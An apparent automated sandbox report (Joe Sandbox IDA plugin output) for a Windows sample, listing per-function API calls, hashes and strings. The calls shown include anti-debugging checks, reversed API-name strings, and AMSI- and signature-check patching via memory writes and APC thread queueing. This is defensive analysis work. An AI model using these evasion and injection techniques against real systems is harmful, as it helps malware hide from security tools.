77963->77935 77964->77963

                                                                      Control-flow Graph

                                                                      [Control-flow graph for the function at 02C95ACC-02C95CF9 (nodes 9232-9256) omitted; the APIs it calls are listed under APIs below. The registry keys Software\Borland\Locales and Software\Borland\Delphi\Locales, GetThreadLocale/GetLocaleInfoA and LoadLibraryExA with flags 00000002 (LOAD_LIBRARY_AS_DATAFILE) match the Delphi RTL's locale-override resource-DLL lookup, i.e. runtime-library code rather than payload logic.]
                                                                      APIs
                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000105,02C90000,02CBE790), ref: 02C95AE8
                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C90000,02CBE790), ref: 02C95B06
                                                                      • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02C90000,02CBE790), ref: 02C95B24
                                                                      • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02C95B42
                                                                      • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02C95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02C95B8B
                                                                      • RegQueryValueExA.ADVAPI32(?,02C95D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02C95BD1,?,80000001), ref: 02C95BA9
                                                                      • RegCloseKey.ADVAPI32(?,02C95BD8,00000000,?,?,00000000,02C95BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02C95BCB
                                                                      • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02C95BE8
                                                                      • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02C95BF5
                                                                      • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02C95BFB
                                                                      • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02C95C26
                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C95C6D
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C95C7D
                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02C95CA5
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02C95CB5
                                                                      • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02C95CDB
                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02C95CEB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                                                                      • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                      • API String ID: 1759228003-2375825460
                                                                      • Opcode ID: 87f69778e298b181970940db66400d3736d06bfa8747a233ae9edc58184a6699
                                                                      • Instruction ID: 91f55bd8d8ab8c8b2592c949050c2f7dbc566600a75838d58ab6d942ff588418
                                                                      • Opcode Fuzzy Hash: 87f69778e298b181970940db66400d3736d06bfa8747a233ae9edc58184a6699
                                                                      • Instruction Fuzzy Hash: D951DA71A4065D7EFF26DAA4CC4AFEF77AD9B04784F8401A1AA04E6181D7B49B44CF60

                                                                      Control-flow Graph

                                                                      control_flow_graph 11492 2ca894c-2ca8971 LoadLibraryW 11493 2ca89bb-2ca89c1 11492->11493 11494 2ca8973-2ca898b GetProcAddress 11492->11494 11495 2ca898d-2ca89ac call 2ca7d78 11494->11495 11496 2ca89b0-2ca89b6 FreeLibrary 11494->11496 11495->11496 11499 2ca89ae 11495->11499 11496->11493 11499->11496
                                                                      APIs
                                                                      • LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize,02D173A8,02CAA93C,UacScan), ref: 02CA8960
                                                                      • GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02CA897A
                                                                      • FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02D173A8,02CAA587,ScanString,02D173A8,02CAA93C,ScanBuffer,02D173A8,02CAA93C,Initialize), ref: 02CA89B6
                                                                        • Part of subcall function 02CA7D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7DEC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadMemoryProcVirtualWrite
                                                                      • String ID: BCryptVerifySignature$bcrypt
                                                                      • API String ID: 1002360270-4067648912
                                                                      • Opcode ID: e9322e0bbcbef5dfd7bc38dac61f4316c425a42784f7998b045ccd875379b160
                                                                      • Instruction ID: 2da5fe92100320bdd11767bb1f88f4eaf4016209fb927d48bc14e225dbae8fa0
                                                                      • Opcode Fuzzy Hash: e9322e0bbcbef5dfd7bc38dac61f4316c425a42784f7998b045ccd875379b160
                                                                      • Instruction Fuzzy Hash: 48F08C71EC0204BFF710A668E84DB56F79CA780B18F000929A9A8867A0C7701C56CB50

                                                                      Control-flow Graph

                                                                      control_flow_graph 11509 2caf744-2caf75e GetModuleHandleW 11510 2caf78a-2caf792 11509->11510 11511 2caf760-2caf772 GetProcAddress 11509->11511 11511->11510 11512 2caf774-2caf784 CheckRemoteDebuggerPresent 11511->11512 11512->11510 11513 2caf786 11512->11513 11513->11510
                                                                      APIs
                                                                      • GetModuleHandleW.KERNEL32(KernelBase), ref: 02CAF754
                                                                      • GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 02CAF766
                                                                      • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02CAF77D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AddressCheckDebuggerHandleModulePresentProcRemote
                                                                      • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                      • API String ID: 35162468-539270669
                                                                      • Opcode ID: cac8b807cf4fedcb280a3bf5da8ff7c77b8578e45389ed5345f3da622c9daade
                                                                      • Instruction ID: 2a4f41f6ac6453db1f42735f17b45c81a0998bf19fc01c4be6593dd94997a1a1
                                                                      • Opcode Fuzzy Hash: cac8b807cf4fedcb280a3bf5da8ff7c77b8578e45389ed5345f3da622c9daade
                                                                      • Instruction Fuzzy Hash: EFF0A07090424DBAEB10A6F8889C7DCFBBD9B0932CF2443E8A435E25C1E7720780CA91

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 02C94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02C94F2E
                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADE40), ref: 02CADDAB
                                                                      • NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,02CADE40), ref: 02CADDDB
                                                                      • NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 02CADDF0
                                                                      • NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 02CADE1C
                                                                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 02CADE25
                                                                        • Part of subcall function 02C94C60: SysFreeString.OLEAUT32(02CAF4A4), ref: 02C94C6E
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: File$PathString$AllocCloseFreeInformationNameName_OpenQueryRead
                                                                      • String ID:
                                                                      • API String ID: 1897104825-0
                                                                      • Opcode ID: bf7c93adfe9ab0597670a3c5b34c26280808538d1ed3c429b540ab4d658a2a7c
                                                                      • Instruction ID: 957879606f4b62f0df473b4f40fa84ba66f7a1e653ac0e743e0a64cd0f2bac11
                                                                      • Opcode Fuzzy Hash: bf7c93adfe9ab0597670a3c5b34c26280808538d1ed3c429b540ab4d658a2a7c
                                                                      • Instruction Fuzzy Hash: A7213071A40309BFEB11EAE4DC56FDEB7BDEB08704F500561B201F71C0DAB4AA059BA4

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02CAE5F6
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CheckConnectionInternet
                                                                      • String ID: Initialize$OpenSession$ScanBuffer
                                                                      • API String ID: 3847983778-3852638603
                                                                      • Opcode ID: 48617458a978c36b5360830ad6d73c28dfc471c4d4e19e55257403aec3d998e6
                                                                      • Instruction ID: b17e778201ad1a93db1269508ac57799c6cc0ae4733adfaf1700c098de84b88b
                                                                      • Opcode Fuzzy Hash: 48617458a978c36b5360830ad6d73c28dfc471c4d4e19e55257403aec3d998e6
                                                                      • Instruction Fuzzy Hash: 65411E75B1010D9FEF24EBA8D855EDEB3BAEF88708F204835E041A7251DA70AD02DF95

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 02C94F20: SysAllocStringLen.OLEAUT32(?,?), ref: 02C94F2E
                                                                      • RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,02CADD5E), ref: 02CADCCB
                                                                      • NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 02CADD05
                                                                      • NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 02CADD32
                                                                      • NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 02CADD3B
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FilePath$AllocCloseCreateNameName_StringWrite
                                                                      • String ID:
                                                                      • API String ID: 3764614163-0
                                                                      • Opcode ID: 7fc9b1fd354cee684bb86b000eca54b12bd1d6fcfe0c02bc56e34a0c176094b3
                                                                      • Instruction ID: f920a9bbf5bd205f8cc6f1d3938b997fa7d67c907d1dc63eed5fa6e2f4e309ed
                                                                      • Opcode Fuzzy Hash: 7fc9b1fd354cee684bb86b000eca54b12bd1d6fcfe0c02bc56e34a0c176094b3
                                                                      • Instruction Fuzzy Hash: E1211D71E41209BEEB20EAA0DD56FDEB3BDEB04B04F614561B601F75C0D7B06A059B64

                                                                      Control-flow Graph

                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02CA8814
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                      • String ID: CreateProcessAsUserW$Kernel32
                                                                      • API String ID: 3130163322-2353454454
                                                                      • Opcode ID: e2cec41f1015a33c312c46624d01e965d62d52b354311fb78cc16f8bec24dca1
                                                                      • Instruction ID: 22d2a66364afe2f290104958d6ccc2727ad09d97e245a00d20c84805b11c324f
                                                                      • Opcode Fuzzy Hash: e2cec41f1015a33c312c46624d01e965d62d52b354311fb78cc16f8bec24dca1
                                                                      • Instruction Fuzzy Hash: 5911F3B2680249BFEB50EFA8DC91F9A77EDEB0C704F514520FA08E3610C634ED119B24
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CA7A9F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                      • API String ID: 4072585319-445027087
                                                                      • Opcode ID: 2328fbee2e331b6bc37e34a8b04be060ec1b8bf6bf2df5f03d1e26873583cef7
                                                                      • Instruction ID: 667fcc84d4757ff7d8d9d4ef4ec3aa42f288d13a6b591d5069d684e008b1afd6
                                                                      • Opcode Fuzzy Hash: 2328fbee2e331b6bc37e34a8b04be060ec1b8bf6bf2df5f03d1e26873583cef7
                                                                      • Instruction Fuzzy Hash: A8116975680209BFEB14EFA4EC65EAEB7EEFB48B04F404460B906D7610D630AE05DB20
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02CA7A9F
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$AllocateMemoryVirtual
                                                                      • String ID: ntdll$yromeMlautriVetacollAwZ
                                                                      • API String ID: 4072585319-445027087
                                                                      • Opcode ID: c4ebd7b8ba6fed13f2c889be9150a56e1e2dd85e525ee9475fde917b2445a288
                                                                      • Instruction ID: 2a1ac81703bec829f8ae8f835920239c28d7347c851c79338581cdb09c87e253
                                                                      • Opcode Fuzzy Hash: c4ebd7b8ba6fed13f2c889be9150a56e1e2dd85e525ee9475fde917b2445a288
                                                                      • Instruction Fuzzy Hash: 81118C75680209BFEB14EFA4EC65FAEB7EEFB48B04F404460B906D7610D630AE05DB20
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02CA7DEC
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$MemoryVirtualWrite
                                                                      • String ID: Ntdll$yromeMlautriVetirW
                                                                      • API String ID: 2719805696-3542721025
                                                                      • Opcode ID: 463d122bf5810602904b9b66b5c2d8a185411b5c9e9ee4294ac33b7a63e0aeb9
                                                                      • Instruction ID: db6577c223bc331952f3390788cf175d0a53038d769343eb1d6b511c5d2e1aba
                                                                      • Opcode Fuzzy Hash: 463d122bf5810602904b9b66b5c2d8a185411b5c9e9ee4294ac33b7a63e0aeb9
                                                                      • Instruction Fuzzy Hash: 6A016975640249BFEB14EFA8EC65E9EB7EDFB49704F504860B804D7A10C730AD159B60
                                                                      APIs
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA823C,?,?,00000000,?,02CA7A7E,ntdll,00000000,00000000,02CA7AC3,?,?,00000000), ref: 02CA820A
                                                                        • Part of subcall function 02CA81CC: GetModuleHandleA.KERNELBASE(?), ref: 02CA821E
                                                                        • Part of subcall function 02CA8274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA82FC,?,?,00000000,00000000,?,02CA8215,00000000,KernelBASE,00000000,00000000,02CA823C), ref: 02CA82C1
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA82C7
                                                                        • Part of subcall function 02CA8274: GetProcAddress.KERNEL32(?,?), ref: 02CA82D9
                                                                      • NtQueueApcThread.NTDLL(?,?,?,?,?), ref: 02CA8761
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1617764748.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                      • Associated: 00000000.00000002.1617738019.0000000002C90000.00000002.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1617954074.0000000002CBE000.00000004.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D17000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002D8F000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0B000.00000040.00001000.00020000.00000000.sdmp
                                                                      • Associated: 00000000.00000002.1618249025.0000000002E0E000.00000040.00001000.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2c90000_nft438A5fN.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: HandleModule$AddressProc$QueueThread
                                                                      • String ID: NtQueueApcThread$ntdll
                                                                      • API String ID: 3075473611-1374908105
                                                                      • Opcode ID: e7c63140f187a9092040aa147447c2e89249373a7f3fbebcd8e6aa7318ba3267
                                                                      • Instruction ID: 3d36399bf48912f6f9f7ef60d83d775a31bf0cbf4bb174b9eee4f790d31fcf17
                                                                      • Opcode Fuzzy Hash: e7c63140f187a9092040aa147447c2e89249373a7f3fbebcd8e6aa7318ba3267
